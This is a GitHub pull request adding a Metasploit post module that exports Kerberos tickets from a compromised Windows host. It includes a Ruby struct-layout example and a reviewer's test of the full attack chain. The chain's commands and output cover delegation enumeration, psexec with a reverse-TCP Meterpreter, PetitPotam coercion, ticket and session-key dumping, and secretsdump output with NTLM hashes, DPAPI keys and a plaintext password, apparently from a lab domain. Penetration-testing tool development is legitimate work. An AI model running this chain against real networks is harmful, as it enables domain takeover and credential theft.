
Add the manage/kerberos_tickets post module #18488

Merged: 16 commits, Dec 8, 2023

Conversation

@zeroSteiner (Contributor) commented Oct 25, 2023

This adds a module to manage Kerberos tickets from a compromised host. This notably allows Kerberos tickets to be exported from the target and then added to Metasploit's own cache, allowing them to be used for the duration in which they are valid. Client versions of Windows do not have a klist binary present, so users will need to rely on this module or bring a tool of their own such as Rubeus. This enables users to exploit Unconstrained Delegation misconfigurations within Metasploit to escalate their privileges.

This module was implemented using Railgun which means that Meterpreters that support railgun will work with it, and we don't need to write multiple Meterpreter extensions. Currently, the Python and Windows Meterpreters both support railgun. As a disadvantage, this module can be a little slow due to all the Windows API calls that need to be made. For that reason, some information is omitted when VERBOSE is disabled. Definitions for structures containing pointers have to be made twice, once for 32-bit and once for 64-bit versions of Windows. The module works without Administrative privileges, but in this case, it is only able to dump Kerberos tickets for the current user. When running with Administrative privileges, it is capable of dumping Kerberos tickets for all users. Nothing is written to disk, no new modules are loaded and no external commands are executed.

This has been tested on Windows 8.1 x86 and Windows 10 x64.

Verification

  • Start msfconsole
  • Obtain a session on a target host
  • Run the different actions in the module
  • See Kerberos tickets show up in Metasploit's cache by running the klist command
  • Read the module docs, make sure they make sense
  • Read the new "Unconstrained Delegation" workflow docs, make sure they make sense
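
The point in the description about pointer-bearing structures needing both a 32-bit and a 64-bit definition, as an added example in plain Ruby (this is not code from the module or this PR): it lays out KERB_RETRIEVE_TKT_REQUEST, one of the LSA request structures a ticket-dumping tool passes to LsaCallAuthenticationPackage, for both pointer sizes using the standard MSVC natural-alignment rules (each member aligned to its own alignment, the whole struct padded to its largest member alignment). The member list is Microsoft's documented C definition; the offsets and sizes are computed here and are not taken from the module's own Railgun definitions, which this example does not reproduce.

```ruby
# Added example, not code from the Metasploit module or this PR: computes the
# 32-bit and 64-bit layouts of KERB_RETRIEVE_TKT_REQUEST (ntsecapi.h) with the
# MSVC natural-alignment rules, to show why a pointer-bearing LSA structure
# needs two definitions. Offsets are derived here, not copied from the module.
module LsaStructLayout
  module_function

  # Primitive sizes for the two Windows targets; only the pointer width differs.
  def primitives(ptr_size)
    { 'ULONG' => 4, 'LONG' => 4, 'USHORT' => 2, 'ULONG_PTR' => ptr_size, 'PWSTR' => ptr_size }
  end

  # Lays out [[name, type], ...]; type is a primitive name or an already laid-out
  # struct hash. Each member is aligned to its own alignment and the struct is
  # padded to its largest member alignment. Returns { fields:, size:, align: }.
  def layout(fields, ptr_size)
    prim = primitives(ptr_size)
    offset = 0
    max_align = 1
    laid = fields.map do |name, type|
      size, align = type.is_a?(Hash) ? [type[:size], type[:align]] : [prim.fetch(type)] * 2
      offset += (align - offset % align) % align         # leading pad before the member
      max_align = [max_align, align].max
      entry = { name: name, offset: offset, size: size }
      offset += size
      entry
    end
    { fields: laid, size: offset + (max_align - offset % max_align) % max_align, align: max_align }
  end

  def field_offset(struct, name)
    struct[:fields].find { |f| f[:name] == name }.fetch(:offset)
  end

  # KERB_RETRIEVE_TKT_REQUEST and the structs it embeds (LUID, UNICODE_STRING, SecHandle).
  def kerb_retrieve_tkt_request(ptr_size)
    luid    = layout([['LowPart', 'ULONG'], ['HighPart', 'LONG']], ptr_size)
    ustring = layout([['Length', 'USHORT'], ['MaximumLength', 'USHORT'], ['Buffer', 'PWSTR']], ptr_size)
    handle  = layout([['dwLower', 'ULONG_PTR'], ['dwUpper', 'ULONG_PTR']], ptr_size)
    layout([['MessageType', 'ULONG'],         # KERB_PROTOCOL_MESSAGE_TYPE, a 4-byte enum
            ['LogonId', luid],
            ['TargetName', ustring],
            ['TicketFlags', 'ULONG'],
            ['CacheOptions', 'ULONG'],
            ['EncryptionType', 'LONG'],
            ['CredentialsHandle', handle]], ptr_size)
  end

  # Members whose offset differs between x86 and x64: everything from the first
  # pointer-bearing member (TargetName) onwards, which is why a single
  # definition cannot serve both targets.
  def shifted_fields
    x86, x64 = kerb_retrieve_tkt_request(4), kerb_retrieve_tkt_request(8)
    x86[:fields].zip(x64[:fields]).reject { |a, b| a[:offset] == b[:offset] }.map { |a, _| a[:name] }
  end

  # One line per member, e.g. "TargetName @16 (16 bytes)", plus the total size.
  def describe(ptr_size)
    st = kerb_retrieve_tkt_request(ptr_size)
    st[:fields].map { |f| "#{f[:name]} @#{f[:offset]} (#{f[:size]} bytes)" } + ["sizeof = #{st[:size]}"]
  end
end
```

Calling `LsaStructLayout.describe(4)` and `describe(8)` side by side shows the 40-byte x86 layout against the 64-byte x64 one; the UNICODE_STRING member alone grows from 8 to 16 bytes because its Buffer pointer forces 8-byte alignment after the two USHORTs, and every member after it moves.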

Also use HeapAlloc so we're not leaking entire pages.
Comment on lines +222 to +226
### Using The Ticket
Now that a TGT for the domain controller has been obtained, it can be used in a Pass-The-Ticket style attack whereby
the attacker uses it to authenticate to the target. The `auxiliary/gather/windows_secrets_dump` module is a good one to
use for this purpose as it will yield additional accounts while avoiding running any kind of payload on the domain
controller.
@zeroSteiner (author) replied:

Note that auxiliary/gather/windows_secrets_dump won't work until #18419 is landed.

@jheysel-r7 self-assigned this Dec 6, 2023
@jheysel-r7 (Contributor) left a comment:

Great work @zeroSteiner. Thanks for the detailed Attack Workflow, it made testing nice and easy to follow. The module along with the PR's many enhancements seem to be working as expected.

I thought I'd include my testing output from the entire workflow in case it helps future travelers:

1. Identify a target computer account configured with unconstrained delegation.

msf6 auxiliary(gather/ldap_query) > options

Module options (auxiliary/gather/ldap_query):

   Name           Current Setting        Required  Description
   ----           ---------------        --------  -----------
   BASE_DN                               no        LDAP base DN if you already have it
   DOMAIN         kerberos.issue         no        The domain to authenticate to
   OUTPUT_FORMAT  table                  yes       The output format to use (Accepted: csv, table, json)
   PASSWORD       N0tpassword!           no        The password to authenticate with
   RHOSTS         172.16.199.200         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          389                    yes       The target port
   SSL            false                  no        Enable SSL on the LDAP connection
   USERNAME       KERBEROSAdministrator  no        The username to authenticate with


   When ACTION is RUN_SINGLE_QUERY:

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   QUERY_ATTRIBUTES                   no        Comma seperated list of attributes to retrieve from the server
   QUERY_FILTER                       no        Filter to send to the target LDAP server to perform the query


   When ACTION is RUN_QUERY_FILE:

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   QUERY_FILE_PATH                   no        Path to the JSON or YAML file to load and run queries from


Auxiliary action:

   Name                           Description
   ----                           -----------
   ENUM_UNCONSTRAINED_DELEGATION  Dump info about all known objects that allow unconstrained delegation.



View the full module info with the info, or info -d command.

msf6 auxiliary(gather/ldap_query) > set username KERBEROS\\Administrator
username => KERBEROS\Administrator
msf6 auxiliary(gather/ldap_query) > run
[*] Running module against 172.16.199.200

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.199.200:389 Getting root DSE
[+] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
[+] 172.16.199.200:389 Discovered schema DN: DC=kerberos,DC=issue
CN=MSF CN=Computers DC=kerberos DC=issue
========================================

 Name            Attributes
 ----            ----------
 cn              MSF
 objectcategory  CN=Computer,CN=Schema,CN=Configuration,DC=kerberos,DC=issue
 samaccountname  MSF$

CN=DC2 OU=Domain Controllers DC=kerberos DC=issue
=================================================

 Name            Attributes
 ----            ----------
 cn              DC2
 objectcategory  CN=Computer,CN=Schema,CN=Configuration,DC=kerberos,DC=issue
 samaccountname  DC2$

[*] Query returned 2 results.
[*] Auxiliary module execution completed

Two potential unconstrained delegation targets, isolate by determining which one is the domain controller:

msf6 auxiliary(gather/ldap_query) > set action ENUM_DOMAIN_CONTROLLERS
action => ENUM_DOMAIN_CONTROLLERS
msf6 auxiliary(gather/ldap_query) > runb
[-] Unknown command: runb
msf6 auxiliary(gather/ldap_query) > run
[*] Running module against 172.16.199.200

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.199.200:389 Getting root DSE
[+] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
[+] 172.16.199.200:389 Discovered schema DN: DC=kerberos,DC=issue
CN=DC2 OU=Domain Controllers DC=kerberos DC=issue
=================================================

 Name                    Attributes
 ----                    ----------
 distinguishedname       CN=DC2,OU=Domain Controllers,DC=kerberos,DC=issue
 dnshostname             dc2.kerberos.issue
 name                    DC2
 operatingsystem         Windows Server 2019 Standard
 operatingsystemversion  10.0 (17763)

[*] Query returned 1 result.
[*] Auxiliary module execution completed

2. Compromise that target computer account to open a Meterpreter session with administrative privileges (SYSTEM works).

Get a session using psexec:

msf6 auxiliary(gather/ldap_query) > set rhosts 172.16.199.134
rhosts => 172.16.199.134
msf6 exploit(windows/smb/psexec) > set SMBDomain kerberos.issue
SMBDomain => kerberos.issue
msf6 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf6 exploit(windows/smb/psexec) > set smbpass N0tpassword!
smbpass => N0tpassword!
msf6 exploit(windows/smb/psexec) > options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                172.16.199.134   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             kerberos.issue   no        The Windows domain to use for authentication
   SMBPass               N0tpassword!     no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               administrator    no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.199.158   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.16.199.158:4444
[*] 172.16.199.134:445 - Connecting to the server...
[*] 172.16.199.134:445 - Authenticating to 172.16.199.134:445|kerberos.issue as user 'administrator'...
[*] 172.16.199.134:445 - Selecting PowerShell target
[*] 172.16.199.134:445 - Executing the payload...
[+] 172.16.199.134:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 172.16.199.134
[*] Meterpreter session 1 opened (172.16.199.158:4444 -> 172.16.199.134:55301) at 2023-12-07 12:38:39 -0900

meterpreter > bg
[*] Backgrounding session 1...

3. Coerce authentication to the compromised target from a domain controller.

Now use petitpotam to do some coercing

msf6 auxiliary(scanner/dcerpc/petitpotam) > set LISTENER msf.kerberos.issue
LISTENER => msf.kerberos.issue
msf6 auxiliary(scanner/dcerpc/petitpotam) > set smbuser administrator
smbuser => administrator
msf6 auxiliary(scanner/dcerpc/petitpotam) > set smbpass N0tpassword!
smbpass => N0tpassword!
msf6 auxiliary(scanner/dcerpc/petitpotam) > set rhosts 172.16.199.200
rhosts => 172.16.199.200
msf6 auxiliary(scanner/dcerpc/petitpotam) > run

[+] 172.16.199.200:445    - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 172.16.199.200:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

4. Dump the Kerberos tickets from the compromised targets to obtain a TGT from the domain controller's computer account.

msf6 post(windows/manage/kerberos_tickets) > set session -1
session => -1
msf6 post(windows/manage/kerberos_tickets) > set SERVICE krbtgt/*
SERVICE => krbtgt/*
msf6 post(windows/manage/kerberos_tickets) > run

[*] LSA Handle: 0x085d16f8
[*] LogonSession LUID: 0x00023eaff
[*]   User:                  KERBEROS\Administrator
[*]   Session:               1
[*]   AuthenticationPackage: Kerberos
[*]   LogonType:             Interactive (2)
[*]   LogonTime:             2023-12-07 08:26:47 -0900
[*]   Ticket[0]
[*]     TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20231207124539_default_172.16.199.200_mit.kerberos.cca_080966.bin
        Primary Principal: Administrator@KERBEROS.ISSUE
        Ccache version: 4

        Creds: 1
          Credential[0]:
            Server: krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE
            Client: Administrator@KERBEROS.ISSUE
            Ticket etype: 18 (AES256)
            Key: bc8048e65bffa4cbb90acbe9218a75a3f9770a60075c2a1bcca3a16f67a4d792
            Subkey: false
            Ticket Length: 1118
            Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
            Addresses: 0
            Authdatas: 0
            Times:
              Auth time: 1969-12-31 16:00:00 -0800
              Start time: 2023-12-07 12:23:37 -0900
              End time: 2023-12-07 22:23:37 -0900
              Renew Till: 2023-12-14 12:23:37 -0900
            Ticket:
              Ticket Version Number: 5
              Realm: KERBEROS.ISSUE
              Server Name: krbtgt/KERBEROS.ISSUE
              Encrypted Ticket Part:
                Ticket etype: 18 (AES256)
                Key Version Number: 2
                Cipher:
                  [base64 ciphertext omitted]
[*] LogonSession LUID: 0x00002564c
[*]   User:                  NT Service\SQLTELEMETRY$VEEAMSQL2016
[*]   Session:               0
[*]   AuthenticationPackage: Negotiate
[*]   LogonType:             Service (5)
[*]   LogonTime:             2023-12-07 08:15:36 -0900
[*] LogonSession LUID: 0x0000003e5
[*]   User:                  NT AUTHORITY\LOCAL SERVICE
[*]   Session:               0
[*]   AuthenticationPackage: Negotiate
[*]   LogonType:             Service (5)
[*]   LogonTime:             2023-12-07 08:15:29 -0900
[*] LogonSession LUID: 0x000012e7b
[*]   User:                  Window Manager\DWM-1
[*]   Session:               1
[*]   AuthenticationPackage: Negotiate
[*]   LogonType:             Interactive (2)
[*]   LogonTime:             2023-12-07 08:15:29 -0900
[*] LogonSession LUID: 0x000012e22
[*]   User:                  Window Manager\DWM-1
[*]   Session:               1
[*]   AuthenticationPackage: Negotiate
[*]   LogonType:             Interactive (2)
[*]   LogonTime:             2023-12-07 08:15:29 -0900
[*] LogonSession LUID: 0x0000003e4
[*]   User:                  KERBEROS\MSF$
[*]   Session:               0
[*]   AuthenticationPackage: Negotiate
[*]   LogonType:             Service (5)
[*]   LogonTime:             2023-12-07 08:15:28 -0900
[*]   Ticket[0]
[*]     TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20231207124543_default_172.16.199.200_mit.kerberos.cca_959988.bin
        Primary Principal: MSF$@KERBEROS.ISSUE
        Ccache version: 4

        Creds: 1
          Credential[0]:
            Server: krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE
            Client: MSF$@KERBEROS.ISSUE
            Ticket etype: 18 (AES256)
            Key: 0b144bd8116664f004c0dee513f9f28bfe907e16896b02545113b1dbca582e3b
            Subkey: false
            Ticket Length: 1021
            Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
            Addresses: 0
            Authdatas: 0
            Times:
              Auth time: 1969-12-31 16:00:00 -0800
              Start time: 2023-12-07 08:15:27 -0900
              End time: 2023-12-07 18:15:27 -0900
              Renew Till: 2023-12-14 08:15:27 -0900
            Ticket:
              Ticket Version Number: 5
              Realm: KERBEROS.ISSUE
              Server Name: krbtgt/KERBEROS.ISSUE
              Encrypted Ticket Part:
                Ticket etype: 18 (AES256)
                Key Version Number: 2
                Cipher:
                  [base64 ciphertext omitted]
[*]   Ticket[1]
[*]     TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20231207124543_default_172.16.199.200_mit.kerberos.cca_681743.bin
        Primary Principal: MSF$@KERBEROS.ISSUE
        Ccache version: 4

        Creds: 1
          Credential[0]:
            Server: krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE
            Client: MSF$@KERBEROS.ISSUE
            Ticket etype: 18 (AES256)
            Key: 0b144bd8116664f004c0dee513f9f28bfe907e16896b02545113b1dbca582e3b
            Subkey: false
            Ticket Length: 1021
            Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
            Addresses: 0
            Authdatas: 0
            Times:
              Auth time: 1969-12-31 16:00:00 -0800
              Start time: 2023-12-07 08:15:27 -0900
              End time: 2023-12-07 18:15:27 -0900
              Renew Till: 2023-12-14 08:15:27 -0900
            Ticket:
              Ticket Version Number: 5
              Realm: KERBEROS.ISSUE
              Server Name: krbtgt/KERBEROS.ISSUE
              Encrypted Ticket Part:
                Ticket etype: 18 (AES256)
                Key Version Number: 2
                Cipher:
                  [base64 ciphertext omitted]
[*] LogonSession LUID: 0x00000ce7b
[*]   User:                  Font Driver Host\UMFD-0
[*]   Session:               0
[*]   AuthenticationPackage: Negotiate
[*]   LogonType:             Interactive (2)
[*]   LogonTime:             2023-12-07 08:15:28 -0900
[*] LogonSession LUID: 0x00000ce28
[*]   User:                  Font Driver Host\UMFD-1
[*]   Session:               1
[*]   AuthenticationPackage: Negotiate
[*]   LogonType:             Interactive (2)
[*]   LogonTime:             2023-12-07 08:15:28 -0900
[*] LogonSession LUID: 0x00000c35f
[*]   User:                  \
[*]   Session:               0
[*]   AuthenticationPackage: NTLM
[*]   LogonType:             UndefinedLogonType (0)
[*]   LogonTime:             2023-12-07 08:15:28 -0900
[-] Failed to call the authentication package. LsaCallAuthenticationPackage authentication package failed with: (0x00000520) ERROR_NO_SUCH_LOGON_SESSION: A specified logon session does not exist. It may already have been terminated.
[*] LogonSession LUID: 0x0000003e7
[*]   User:                  KERBEROS\MSF$
[*]   Session:               0
[*]   AuthenticationPackage: Negotiate
[*]   LogonType:             UndefinedLogonType (0)
[*]   LogonTime:             2023-12-07 08:15:27 -0900
[*]   Ticket[0]
[*]     TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20231207124546_default_172.16.199.200_mit.kerberos.cca_652150.bin
        Primary Principal: MSF$@KERBEROS.ISSUE
        Ccache version: 4

        Creds: 1
          Credential[0]:
            Server: krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE
            Client: MSF$@KERBEROS.ISSUE
            Ticket etype: 18 (AES256)
            Key: 7cf6c1f0f806ff124763bf2aacf7570bde54159b9476b890030d5072d9fe76a4
            Subkey: false
            Ticket Length: 1021
            Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
            Addresses: 0
            Authdatas: 0
            Times:
              Auth time: 1969-12-31 16:00:00 -0800
              Start time: 2023-12-07 08:15:27 -0900
              End time: 2023-12-07 18:15:27 -0900
              Renew Till: 2023-12-14 08:15:27 -0900
            Ticket:
              Ticket Version Number: 5
              Realm: KERBEROS.ISSUE
              Server Name: krbtgt/KERBEROS.ISSUE
              Encrypted Ticket Part:
                Ticket etype: 18 (AES256)
                Key Version Number: 2
                Cipher:
                  [base64 ciphertext omitted]
[*]   Ticket[1]
[*]     TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20231207124547_default_172.16.199.200_mit.kerberos.cca_235052.bin
        Primary Principal: MSF$@KERBEROS.ISSUE
        Ccache version: 4

        Creds: 1
          Credential[0]:
            Server: krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE
            Client: MSF$@KERBEROS.ISSUE
            Ticket etype: 18 (AES256)
            Key: 7cf6c1f0f806ff124763bf2aacf7570bde54159b9476b890030d5072d9fe76a4
            Subkey: false
            Ticket Length: 1021
            Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
            Addresses: 0
            Authdatas: 0
            Times:
              Auth time: 1969-12-31 16:00:00 -0800
              Start time: 2023-12-07 08:15:27 -0900
              End time: 2023-12-07 18:15:27 -0900
              Renew Till: 2023-12-14 08:15:27 -0900
            Ticket:
              Ticket Version Number: 5
              Realm: KERBEROS.ISSUE
              Server Name: krbtgt/KERBEROS.ISSUE
              Encrypted Ticket Part:
                Ticket etype: 18 (AES256)
                Key Version Number: 2
                Cipher:
                  p9WLJTbPQqJSKKs9NY+dAZqq+EdgyBngvnBQMvDDunkqz+02TiFevhHCUUUWBWfCjv+/+w5H4Oai4+Nj57Pr7qWD2CP6TOM+7aI53UUBWLSCHz82zCmlmRLBD+zeqvf+fqCcNICI2L0HLREXFSPCO6J8Xva2cVUgHbkhTPqTLij9HbfaXm1OpoQcm/3Xu9iPOPwnnmV9FLBScwWX2G0o43cVhZOYYoKjZL/c3axITEBzcoZ6opc1Rsd2IpqWqquelFgm8xGJUKs8t81yI0cRT1iqd13LTdVE3ISfVHyWlU2W+IIqQf7B1Vzq8Y3c00MD/DQYIipl6JM5TpNAsLz0Bhnfpn2dQ55SKuYlukQ5cvSbmIweZrdZ4bgTx7EQCd/GH7puKdZhoPLtp6lGUXxoAmyzz2+3fjyEFjaWNL0VGUamqk8RAg1YvLDxYqRGBC7mtBMl46k0CTzrVpoEnx55adMrnSu3X0w+QkZ0Udt0MoyuLPihnLHeB+UaoMI9PW8EZI6fQVcQTupznu1TLaaGKE4ATGAmpaXopEPBxt7ZZsLLFg50sh7ouDlw1dQE1HwYG5KvVbtELCr0hFXf5mMpSQeAhIbgGUUrFo1GEuRs7gwRQ1c4pMB5mBPbsmgkLUeb5PHex7QaGpExwpE7Ckfsxkn3GpcsQHP97wnXOA8CgSN6fetyazoKNE869P13reJ11x+XgJ/ICcqIds9+PCxLL5AqRJPJH/1Actlh4F2vik1dlL53+DqtNcOFUYcUYke1kc2TtTu15MvJ4Jr2qUaVz2U5TarDCxS3sv9p718MyKahDAiiv12tbag5iyOzoSjXeiXnlktJ5aytHeuaxXT3nXdfevrhczT3omxE0rlCGed4WEtTugyFJX3NwuSGJGkZmowEBN47W0mfrP07Q/67+dp9CvZaySwAKH31N+DFFjum5xuWETCa/Op+aml8rLQFAHOjjRvVjNXpsJkeas3U6juKbJzJ3366iczrPV1wMe89W4+wjke3MZPXgWsDP6BZYUDFRPpKLm4eSxl8yyirH/bwN/fzhtes7/Nq2Ucq6sISxHxwHhMf5hGPxnw31m/GiVf2V+Rh/rbzxHVrxOizWzwV7tfvbqNCgww7aEIJ8xVXY8JeS4mSAYW4F1ZjNGpQ17IK5hm/7srcT0YwZ/WQARRT2tO5DtFp9L/D3SX0eQdfWt+KH2F2MOH1l9Qf4AwSBt6L3WLCXXqkY+16D8Dv
[*] Post module execution completed

Look at all those tickets! (most of them are old, should have cleaned my klist before starting, though the one at the bottom is the one we just got.)

msf6 post(windows/manage/kerberos_tickets) > klist
Kerberos Cache
==============
id   host            principal                     sname                                   issued                     status       path
--   ----            ---------                     -----                                   ------                     ------       ----
100                  Administrator@KERBEROS.ISSUE  krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE    2023-11-28 06:39:38 -0900  active       /home/msfuser/.msf4/loot/20231128063938_default_unknown_mit.kerberos.cca_413255.bin
101  172.16.199.200  Administrator@KERBEROS.ISSUE  cifs/dc2.kerberos.issue@KERBEROS.ISSUE  2023-11-28 06:43:28 -0900  >>expired<<  /home/msfuser/.msf4/loot/20231128064329_default_172.16.199.200_mit.kerberos.cca_461032.bin
103  172.16.199.200  MSF$@KERBEROS.ISSUE           krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE    2023-12-07 08:15:27 -0900  active       /home/msfuser/.msf4/loot/20231207124543_default_172.16.199.200_mit.kerberos.cca_959988.bin
104  172.16.199.200  MSF$@KERBEROS.ISSUE           krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE    2023-12-07 08:15:27 -0900  active       /home/msfuser/.msf4/loot/20231207124543_default_172.16.199.200_mit.kerberos.cca_681743.bin
105  172.16.199.200  MSF$@KERBEROS.ISSUE           krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE    2023-12-07 08:15:27 -0900  active       /home/msfuser/.msf4/loot/20231207124546_default_172.16.199.200_mit.kerberos.cca_652150.bin
106  172.16.199.200  MSF$@KERBEROS.ISSUE           krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE    2023-12-07 08:15:27 -0900  active       /home/msfuser/.msf4/loot/20231207124547_default_172.16.199.200_mit.kerberos.cca_235052.bin
102  172.16.199.200  Administrator@KERBEROS.ISSUE  krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE    2023-12-07 12:23:37 -0900  active       /home/msfuser/.msf4/loot/20231207124539_default_172.16.199.200_mit.kerberos.cca_080966.bin

5. Use the TGT to authenticate to the domain controller as itself

Test the ticket we just obtained with auxiliary/gather/windows_secrets_dump:

msf6 post(windows/manage/kerberos_tickets) > use auxiliary/gather/windows_secrets_dump
msf6 auxiliary(gather/windows_secrets_dump) > set rhosts 172.16.199.200
rhosts => 172.16.199.200
msf6 auxiliary(gather/windows_secrets_dump) > set SMBDomain kerberos.issue
SMBDomain => kerberos.issue
msf6 auxiliary(gather/windows_secrets_dump) > set SMB::Auth kerberos
SMB::Auth => kerberos
msf6 auxiliary(gather/windows_secrets_dump) > set SMB::Rhostname dc2.kerberos.issue
SMB::Rhostname => dc2.kerberos.issue
msf6 auxiliary(gather/windows_secrets_dump) > set smb::krb5ccname /home/msfuser/.msf4/loot/20231207124539_default_172.16.199.200_mit.kerberos.cca_080966.bin
smb::krb5ccname => /home/msfuser/.msf4/loot/20231207124539_default_172.16.199.200_mit.kerberos.cca_080966.bin
msf6 auxiliary(gather/windows_secrets_dump) > set SMBUser Administrator
SMBUser => Administrator
msf6 auxiliary(gather/windows_secrets_dump) > run
[*] Running module against 172.16.199.200

[*] 172.16.199.200:445 - Loaded a credential from ticket file: /home/msfuser/.msf4/loot/20231207124539_default_172.16.199.200_mit.kerberos.cca_080966.bin
[+] 172.16.199.200:445 - 172.16.199.200:88 - Received a valid TGS-Response
[*] 172.16.199.200:445 - 172.16.199.200:445 - TGS MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20231207125716_default_172.16.199.200_mit.kerberos.cca_706000.bin
[+] 172.16.199.200:445 - 172.16.199.200:88 - Received a valid delegation TGS-Response
[*] 172.16.199.200:445 - Service RemoteRegistry is in stopped state
[*] 172.16.199.200:445 - Starting service...
[*] 172.16.199.200:445 - Retrieving target system bootKey
[+] 172.16.199.200:445 - bootKey: 0xa1a5b68266be4bd9dc321c7df4f33d9d
[*] 172.16.199.200:445 - Saving remote SAM database
[*] 172.16.199.200:445 - Dumping SAM hashes
[*] 172.16.199.200:445 - Password hints:
No users with password hints on this system
[*] 172.16.199.200:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] 172.16.199.200:445 - Saving remote SECURITY database
[*] 172.16.199.200:445 - Decrypting LSA Key
[*] 172.16.199.200:445 - Dumping LSA Secrets
$MACHINE.ACC
KERBEROS\DC2$:plain_password_hex:6824fa678afe37c2ce5c8e3cb17518c85f5e5bdfc60a21ea62551002a4d18daae4d7fbd1a09c0ad749e63560d09d98d06fb7008eab454a16b05d416dc0672bcc060752f05bfe84cff7d37509c5838fc2f43fe060013509121f88ce892bb3f372763b683db587f5722226bb18625f70f7cca92dadbd67b210512ba20bcc50e630cde50786f6e5ffc616d879ee056765f78b839d636cde34c3428dc5c10ff723a4c6b7f4e9c8b3021fac0dfc8a0c366ca8e478f88c14a0dd3693621aec781a3ee99505155d12547bd69080046749ce4fab4be5f252062663f43dd6b3c5a11df99307f047b5c753e91a8b61132c5e6fdbd9
KERBEROS\DC2$:aad3b435b51404eeaad3b435b51404ee:e567d50f4fb4b699a22c0342c66526ad:::

DefaultPassword
KERBEROS\msfuser: N0tpassword!

DPAPI_SYSTEM
dpapi_machinekey: 0x93780a4a58c9a699c6677c0458f7fc8f9991563c
dpapi_userkey: 0x25208fc3ddbe2e490212b21b35bb479b042d41ba

NL$KM
f1 47 26 b8 b1 86 a5 59 16 9a 38 4e e6 1e 65 40    |.G&....Y..8N..e@|
a6 06 9e 87 41 1f a5 54 5d 1f 0c 02 8a 9b d9 c2    |....A..T].......|
8e e0 20 ad 49 68 71 f5 e0 c0 93 7f fb 54 db 0f    |.. .Ihq......T..|
e2 86 cf 13 c2 d6 9e 80 06 fe 1a f3 16 5b 86 ad    |.............[..|
Hex string: f14726b8b186a559169a384ee61e6540a6069e87411fa5545d1f0c028a9bd9c28ee020ad496871f5e0c0937ffb54db0fe286cf13c2d69e8006fe1af3165b86ad

[*] 172.16.199.200:445 - Decrypting NL$KM
[*] 172.16.199.200:445 - Dumping cached hashes
No cached hashes on this system
[*] 172.16.199.200:445 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 172.16.199.200:445 - Using the DRSUAPI method to get NTDS.DIT secrets

Actions ENUM_LUIDS & SHOW_LUID seem to be working just fine as well:

ENUM_LUIDS & SHOW_LUID

msf6 post(windows/manage/kerberos_tickets) > set action ENUM_LUIDS
action => ENUM_LUIDS
msf6 post(windows/manage/kerberos_tickets) > run

[*] LogonSession LUID: 0x00023eaff
[*]   User:                  KERBEROS\Administrator
[*]   Session:               1
[*]   AuthenticationPackage: Kerberos
[*]   LogonType:             Interactive (2)
[*]   LogonTime:             2023-12-07 08:26:47 -0900
[*] LogonSession LUID: 0x00002564c
[*]   User:                  NT Service\SQLTELEMETRY$VEEAMSQL2016
[*]   Session:               0
[*]   AuthenticationPackage: Negotiate
[*]   LogonType:             Service (5)
